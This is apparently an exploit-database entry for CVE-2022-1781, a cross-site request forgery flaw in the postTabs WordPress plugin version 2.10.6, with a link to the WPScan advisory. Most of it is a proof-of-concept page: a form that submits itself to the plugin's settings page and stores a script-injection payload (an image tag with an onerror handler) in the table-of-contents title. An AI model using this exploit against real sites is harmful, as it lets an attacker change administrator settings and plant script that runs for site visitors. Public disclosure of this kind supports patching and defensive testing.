CVE: CVE-2022-1781

Name: postTabs (posttabs)

Version: 2.10.6

Date: 2022-04-22 21:41:18

Advisory: https://wpscan.com/vulnerability/7f2ae2c9-57d4-46a0-a9a1-585ec543b153

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=postTabs.php" method="POST">
    <input type="text" name="line" value="#fff">
    <input type="text" name="active_font" value="#fff">
    <input type="text" name="active_bg" value="#fff">
    <input type="text" name="over_font" value="#fff">
    <input type="text" name="over_bg" value="#fff">
    <input type="text" name="inactive_font" value="#fff">
    <input type="text" name="inactive_bg" value="#fff">
    <input type="text" name="align" value="left">
    <input type="text" name="TOC_title" value="<img src=x onerror=alert(1)>">
    <input type="text" name="TOC" value="END">
    <input type="text" name="list_link" value="hideshow">
    <input type="text" name="single_link" value="hideshow">
    <input type="text" name="cookies" value="1">
    <input type="text" name="show_perma" value="never">
    <input type="text" name="submit_postTab" value="Update Settings »">
</form>
<script>
    document.forms[0].submit();
</script>